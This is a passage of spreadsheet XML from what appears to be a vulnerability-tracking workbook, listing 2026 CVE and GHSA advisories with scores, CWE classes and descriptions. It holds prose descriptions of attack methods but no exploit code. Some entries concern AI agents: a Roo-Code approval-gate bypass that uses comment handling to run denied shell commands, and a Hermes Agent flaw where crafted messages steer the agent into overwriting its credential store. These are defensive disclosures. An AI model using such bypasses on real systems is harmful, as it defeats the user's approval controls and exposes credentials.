        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R1048" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 SAP Adapter is vulnerable to an XML external entity (XXE) attack.</t>
        </is>
      </c>
      <c r="S1048" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81832</t>
        </is>
      </c>
    </row>
    <row r="1049">
      <c r="A1049" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1049" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1049" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82537</t>
        </is>
      </c>
      <c r="D1049" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1049" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1049" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1049" s="5" t="inlineStr"/>
      <c r="H1049" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1049" s="5" t="inlineStr"/>
      <c r="J1049" s="5" t="inlineStr"/>
      <c r="K1049" s="5" t="inlineStr"/>
      <c r="L1049" s="5" t="inlineStr"/>
      <c r="M1049" s="5" t="inlineStr"/>
      <c r="N1049" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1049" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1049" s="5" t="inlineStr"/>
      <c r="Q1049" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="R1049" s="5" t="inlineStr">
        <is>
          <t>Roo-Code through 3.54.0 contains an auto-approve bypass vulnerability that allows attackers to execute denied shell commands by exploiting a word-boundary mismatch in comment handling between the approval gate's shell parser and bash. Attackers can craft a command string with an allowlisted word immediately followed by a hash character, separator, and denied command to pass the approval gate while bash executes the denied command with the agent's auto-execute privileges on the developer's machine.</t>
        </is>
      </c>
      <c r="S1049" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82537</t>
        </is>
      </c>
    </row>
    <row r="1050">
      <c r="A1050" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1050" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1050" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84361</t>
        </is>
      </c>
      <c r="D1050" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1050" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1050" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1050" s="5" t="inlineStr"/>
      <c r="H1050" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1050" s="5" t="inlineStr"/>
      <c r="J1050" s="5" t="inlineStr"/>
      <c r="K1050" s="5" t="inlineStr"/>
      <c r="L1050" s="5" t="inlineStr">
        <is>
          <t>composer:composer/composer</t>
        </is>
      </c>
      <c r="M1050" s="5" t="inlineStr">
        <is>
          <t>2.10.3, 2.2.30</t>
        </is>
      </c>
      <c r="N1050" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1050" s="5" t="inlineStr"/>
      <c r="P1050" s="5" t="inlineStr"/>
      <c r="Q1050" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R1050" s="5" t="inlineStr">
        <is>
          <t>## Summary
If the `p4` Perforce CLI client is installed, a malicious dependency package from a package repository allowing arbitrary perforce source URLs (packagist.org is safe) could execute arbitrary commands when running `composer install` or `composer update`. Composer passed a package's Perforce source address to the `p4` CLI client without validating it. The `p4` CLI client accepts addresses that mean "run this local command" instead of "connect to this server". This is remote code execution with the privileges of the user or CI account running Composer.
## Am I affected?
You are only affected if all of the following are true:
- The Perforce `p4` command line client is installed and on the `PATH` of the machine running Composer.
- An attacker can control a package metadata's `source` section with a perforce type. Packagist.org does not allow perforce source metadata, so you are only exploitable if you rely on another Composer repository (any custom `composer`-type repository, or an inline `package` repository entry), or a `composer.lock` file you obtained from somewhere you do not trust.
- The package gets installed from source, either because it has no dist artifact or because source installs are selected (for example `--prefer-source`).
Plainly not affected: anyone without the `p4` client installed, which is the large majority of Composer users. Perforce is an optional VCS integration. Also not affected: projects that only consume packages from Packagist.org, which does not allow Perforce source repositories and therefore cannot serve a package with a Perforce source address.
Most realistic way to get hit: a developer workstation or CI image that has Perforce tooling installed, pulling packages from a private or third party Composer repository that an attacker has compromised.
## Patched versions
Composer now validates Perforce source addresses before handing them to the `p4` client, and accepts only real network endpoints (an optional `tcp`/`ssl` transport with a host and port). Addresses that make the client spawn a local process are rejected, and the package fails validation on both update and install, before any `p4` command runs. Fixed in Composer **2.10.3** and **2.2.30**.
Note: If you legitimately use Perforce with an unusual `P4PORT` value that is not a plain host and port, Composer will now reject it.
## Workarounds
Upgrading is the only complete fix.
Risk reduction short of upgrading:
- Remove the `p4` client from the `PATH` of machines that run Composer but do not use Perforce. This fully blocks this specific attack, since the vulnerability depends on that client being present.
- Restrict configured repositories to sources you control or trust, and treat lock files from untrusted sources as untrusted input.</t>
        </is>
      </c>
      <c r="S1050" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84361</t>
        </is>
      </c>
    </row>
    <row r="1051">
      <c r="A1051" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1051" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1051" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86207</t>
        </is>
      </c>
      <c r="D1051" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1051" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1051" s="5" t="inlineStr">
        <is>
          <t>a5532a13-c4dd-4202-bef1-e0b8f2f8d12b</t>
        </is>
      </c>
      <c r="G1051" s="5" t="inlineStr"/>
      <c r="H1051" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1051" s="5" t="inlineStr"/>
      <c r="J1051" s="5" t="inlineStr"/>
      <c r="K1051" s="5" t="inlineStr"/>
      <c r="L1051" s="5" t="inlineStr"/>
      <c r="M1051" s="5" t="inlineStr"/>
      <c r="N1051" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1051" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1051" s="5" t="inlineStr"/>
      <c r="Q1051" s="5" t="inlineStr">
        <is>
          <t>CWE-305</t>
        </is>
      </c>
      <c r="R1051" s="5" t="inlineStr">
        <is>
          <t>An authentication bypass in N-central &lt; 2026.3 HF 3 leads to authentication bypass in internal only APIs</t>
        </is>
      </c>
      <c r="S1051" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86207</t>
        </is>
      </c>
    </row>
    <row r="1052">
      <c r="A1052" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1052" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1052" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9040</t>
        </is>
      </c>
      <c r="D1052" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1052" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1052" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1052" s="5" t="inlineStr"/>
      <c r="H1052" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1052" s="5" t="inlineStr"/>
      <c r="J1052" s="5" t="inlineStr"/>
      <c r="K1052" s="5" t="inlineStr"/>
      <c r="L1052" s="5" t="inlineStr"/>
      <c r="M1052" s="5" t="inlineStr"/>
      <c r="N1052" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1052" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1052" s="5" t="inlineStr"/>
      <c r="Q1052" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1052"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S1052" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9040</t>
        </is>
      </c>
    </row>
    <row r="1053">
      <c r="A1053" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1053" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1053" s="5" t="inlineStr">
        <is>
          <t>GHSA-298h-jpq4-m665</t>
        </is>
      </c>
      <c r="D1053" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E1053" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1053" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1053" s="5" t="inlineStr"/>
      <c r="H1053" s="5" t="inlineStr"/>
      <c r="I1053" s="5" t="inlineStr"/>
      <c r="J1053" s="5" t="inlineStr"/>
      <c r="K1053" s="5" t="inlineStr"/>
      <c r="L1053" s="5" t="inlineStr">
        <is>
          <t>pip:GitPython</t>
        </is>
      </c>
      <c r="M1053" s="5" t="inlineStr"/>
      <c r="N1053" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1053" s="5" t="inlineStr"/>
      <c r="P1053" s="5" t="inlineStr"/>
      <c r="Q1053" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R1053" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-9rj7-rf2p-w77r. This link is maintained to preserve external references.
## Original Description
GitPython before 3.1.58 contains a remote code execution vulnerability in Repo.init that forwards unsafe git options without validation. Attackers can supply a template parameter pointing to a directory with malicious git hooks that execute arbitrary code when git operations are performed on the initialized repository.</t>
        </is>
      </c>
      <c r="S1053" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-298h-jpq4-m665</t>
        </is>
      </c>
    </row>
    <row r="1054">
      <c r="A1054" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1054" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1054" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-46418</t>
        </is>
      </c>
      <c r="D1054" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E1054" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1054" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1054" s="5" t="inlineStr"/>
      <c r="H1054" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1054" s="5" t="inlineStr"/>
      <c r="J1054" s="5" t="inlineStr"/>
      <c r="K1054" s="5" t="inlineStr"/>
      <c r="L1054" s="5" t="inlineStr"/>
      <c r="M1054" s="5" t="inlineStr"/>
      <c r="N1054" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1054" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1054" s="5" t="inlineStr"/>
      <c r="Q1054" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R1054" s="5" t="inlineStr">
        <is>
          <t>Westermo WeOS 5.x starting from 5.24 allows OS command injection via a media definition.</t>
        </is>
      </c>
      <c r="S1054" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-46418</t>
        </is>
      </c>
    </row>
    <row r="1055">
      <c r="A1055" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1055" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1055" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77110</t>
        </is>
      </c>
      <c r="D1055" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E1055" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1055" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G1055" s="5" t="inlineStr"/>
      <c r="H1055" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1055" s="5" t="inlineStr"/>
      <c r="J1055" s="5" t="inlineStr"/>
      <c r="K1055" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L1055" s="5" t="inlineStr"/>
      <c r="M1055" s="5" t="inlineStr"/>
      <c r="N1055" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1055" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1055" s="5" t="inlineStr"/>
      <c r="Q1055" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1055"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S1055" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77110</t>
        </is>
      </c>
    </row>
    <row r="1056">
      <c r="A1056" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1056" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1056" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79749</t>
        </is>
      </c>
      <c r="D1056" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E1056" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1056" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1056" s="5" t="inlineStr"/>
      <c r="H1056" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1056" s="5" t="inlineStr"/>
      <c r="J1056" s="5" t="inlineStr"/>
      <c r="K1056" s="5" t="inlineStr"/>
      <c r="L1056" s="5" t="inlineStr"/>
      <c r="M1056" s="5" t="inlineStr"/>
      <c r="N1056" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1056" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P1056" s="5" t="inlineStr"/>
      <c r="Q1056" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1056" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.32, MCPHub's SSRF guard in src/utils/ssrf.ts uses a custom isBlockedIpv6 function that only checks for loopback, link-local, unique-local, IPv4-mapped, and IPv4-compatible IPv6 addresses. IPv6 transition address families -- NAT64 (64:ff9b::/96), 6to4 (2002::/16), and Teredo (2001::/32) -- are not checked. An attacker who can specify a URL for an MCP server connection can encode a private IPv4 address inside one of these IPv6 forms to bypass the SSRF guard and reach internal infrastructure. This issue has been patched in version 1.0.32.</t>
        </is>
      </c>
      <c r="S1056" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79749</t>
        </is>
      </c>
    </row>
    <row r="1057">
      <c r="A1057" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1057" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1057" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82020</t>
        </is>
      </c>
      <c r="D1057" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E1057" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1057" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1057" s="5" t="inlineStr"/>
      <c r="H1057" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1057" s="5" t="inlineStr"/>
      <c r="J1057" s="5" t="inlineStr"/>
      <c r="K1057" s="5" t="inlineStr"/>
      <c r="L1057" s="5" t="inlineStr"/>
      <c r="M1057" s="5" t="inlineStr"/>
      <c r="N1057" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1057" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P1057" s="5" t="inlineStr"/>
      <c r="Q1057" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="R1057" s="5" t="inlineStr">
        <is>
          <t>Hermes Agent 0.16.0 prior to 0.17.0 contains an improper path restriction vulnerability that allows attackers who can influence ingested message content to overwrite the credential store by bypassing sensitive-path guards that excluded the auth.json file. Attackers can craft malicious messages directing the agent's file-write tooling to overwrite the credential store without triggering any path-based protection, enabling credential tampering or unauthorized access.</t>
        </is>
      </c>
      <c r="S1057" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82020</t>
        </is>
      </c>
    </row>
    <row r="1058">
      <c r="A1058" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1058" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1058" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82053</t>
        </is>
      </c>
      <c r="D1058" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E1058" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1058" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1058" s="5" t="inlineStr"/>
      <c r="H1058" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1058" s="5" t="inlineStr"/>
      <c r="J1058" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1058" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1058" s="5" t="inlineStr"/>
      <c r="M1058" s="5" t="inlineStr"/>
      <c r="N1058" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1058" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1058" s="5" t="inlineStr"/>
      <c r="Q1058" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1058"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S1058" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82053</t>
        </is>
      </c>
    </row>
    <row r="1059">
      <c r="A1059" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1059" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1059" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85533</t>
        </is>
      </c>
      <c r="D1059" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E1059" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1059" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G1059" s="5" t="inlineStr"/>
      <c r="H1059" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1059" s="5" t="inlineStr"/>
      <c r="J1059" s="5" t="inlineStr"/>
      <c r="K1059" s="5" t="inlineStr"/>
      <c r="L1059" s="5" t="inlineStr"/>
      <c r="M1059" s="5" t="inlineStr"/>
      <c r="N1059" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1059" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1059" s="5" t="inlineStr"/>
      <c r="Q1059" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1059" s="5" t="inlineStr">
        <is>
          <t>An authorization flaw in MISP allowed an authenticated user to submit a sharing_group_id without verifying that the user was authorized to use the referenced Sharing Group.
In several attribute and Galaxy Cluster creation and editing workflows, validation of the submitted Sharing Group was performed only when the request explicitly set the distribution field to 4 ("Sharing Group"). An attacker could therefore craft a request containing a sharing_group_id while omitting the distribution parameter, or otherwise avoiding the distribution == 4 condition, causing the Sharing Group authorization check to be skipped.
This could allow a user with permission to create or modify the affected MISP objects to associate data with a Sharing Group that they are not authorized to use. Depending on the affected object's existing distribution settings and subsequent processing, this could bypass intended information-sharing boundaries and result in unauthorized placement or distribution of data to members of another Sharing Group.
The issue affected attribute attachment and editing operations as well as Galaxy Cluster creation and editing. The fix ensures that authorization is performed whenever a non-empty sharing_group_id is submitted, independently of the distribution parameter. It also centralizes the authorization decision in SharingGroup::canUse() and explicitly rejects empty Sharing Group identifiers rather than allowing them to be interpreted as an unrestricted query.</t>
        </is>
      </c>
      <c r="S1059" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85533</t>
        </is>
      </c>
    </row>
    <row r="1060">
      <c r="A1060" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1060" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1060" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86073</t>
        </is>
      </c>
      <c r="D1060" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E1060" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1060" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1060" s="5" t="inlineStr"/>
      <c r="H1060" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1060" s="5" t="inlineStr"/>
      <c r="J1060" s="5" t="inlineStr"/>
      <c r="K1060" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L1060" s="5" t="inlineStr"/>
      <c r="M1060" s="5" t="inlineStr"/>
      <c r="N1060" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1060" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1060" s="5" t="inlineStr"/>
      <c r="Q1060" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1060" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 2.37.7 and 2.38.1, the OAuth token endpoint bound an authorization code's first access token to the consented resource but did not bind its refresh token. Refreshing checked only that the requested resource was registered, not that it matched the original grant. An OAuth client approved for one workflow could substitute a different workflow URL in the resource parameter and obtain a valid token for an unapproved workflow accessible to the consenting user. This issue is fixed in versions 2.37.7 and 2.38.1.</t>
        </is>
      </c>
      <c r="S1060" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86073</t>
        </is>
      </c>
    </row>
    <row r="1061">
      <c r="A1061" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1061" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1061" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-44320</t>
        </is>
      </c>
      <c r="D1061" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1061" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1061" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1061" s="5" t="inlineStr"/>
      <c r="H1061" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1061" s="5" t="inlineStr"/>
      <c r="J1061" s="5" t="inlineStr"/>
      <c r="K1061" s="5" t="inlineStr"/>
      <c r="L1061" s="5" t="inlineStr"/>
      <c r="M1061" s="5" t="inlineStr"/>
      <c r="N1061" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1061" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1061" s="5" t="inlineStr"/>
      <c r="Q1061" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R1061" s="5" t="inlineStr">
        <is>
          <t>Parrot AR.Drone version 1 and 2 does not employ a suitable mechanism to prevent denial-of-service (DoS) attacks. An attacker can harm the device availability (i.e., video streaming and control) by using tool to perform an IPv4 flood attack. Verified attacks includes SYN flooding and UDP flooding.</t>
        </is>
      </c>
      <c r="S1061" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-44320</t>
        </is>
      </c>
    </row>
    <row r="1062">
      <c r="A1062" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1062" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1062" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0860</t>
        </is>
      </c>
      <c r="D1062" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1062" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1062" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1062" s="5" t="inlineStr"/>
      <c r="H1062" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1062" s="5" t="inlineStr"/>
      <c r="J1062" s="5" t="inlineStr"/>
      <c r="K1062" s="5" t="inlineStr"/>
      <c r="L1062" s="5" t="inlineStr"/>
      <c r="M1062" s="5" t="inlineStr"/>
      <c r="N1062" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1062" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1062" s="5" t="inlineStr"/>
      <c r="Q1062" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1062"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S1062" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0860</t>
        </is>
      </c>
    </row>
    <row r="1063">
      <c r="A1063" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1063" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1063" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12483</t>
        </is>
      </c>
      <c r="D1063" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1063" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1063" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1063" s="5" t="inlineStr"/>
      <c r="H1063" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1063" s="5" t="inlineStr"/>
      <c r="J1063" s="5" t="inlineStr"/>
      <c r="K1063" s="5" t="inlineStr"/>
      <c r="L1063" s="5" t="inlineStr"/>
      <c r="M1063" s="5" t="inlineStr"/>
      <c r="N1063" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1063" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1063" s="5" t="inlineStr"/>
      <c r="Q1063" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R1063" s="5" t="inlineStr">
        <is>
          <t>The LearnDash LMS plugin for WordPress is vulnerable to Unrestricted File Type Upload in versions up to and including 5.1.5. This is due to insufficient input validation in the 'learndash_fileupload_process' function, which iterates through an entire array and validates only the first file. This makes it possible for authenticated attackers, with subscriber-level access and above who are enrolled in a course with assignment uploads enabled, to upload arbitrary disallowed files, including PHP files, to the server's wp-content/uploads/learndash/assignments/ directory. The uploaded files can only be used for Remote Code Execution if default server configurations have been changed to allow for execution.</t>
        </is>
      </c>
      <c r="S1063" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12483</t>
        </is>
      </c>
    </row>
    <row r="1064">
      <c r="A1064" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1064" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1064" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13297</t>
        </is>
      </c>
      <c r="D1064" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1064" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1064" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1064" s="5" t="inlineStr"/>
      <c r="H1064" s="5" t="n">
